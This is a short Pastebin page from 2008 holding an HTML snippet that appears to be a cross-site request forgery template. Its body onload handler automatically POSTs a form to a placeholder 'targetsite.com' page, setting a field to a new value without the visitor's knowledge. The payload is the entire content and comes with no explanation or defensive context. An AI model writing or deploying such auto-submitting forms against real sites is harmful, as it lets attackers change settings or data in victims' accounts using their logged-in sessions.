Share Pastebin
Guest
Public paste!

blah

By: a guest | Oct 2nd, 2008 | Syntax: HTML | Size: 0.22 KB | Hits: 88 | Expires: Never
Copy text to clipboard
  1. <body onload="myform.submit();">
  2. <form name="myform" method="post" action="http://targetsite.com/targetpage.php">
  3. <input type="text" name="targetfield" value="newvalue">
  4. <input type="submit">
  5. </body>
  6. </html>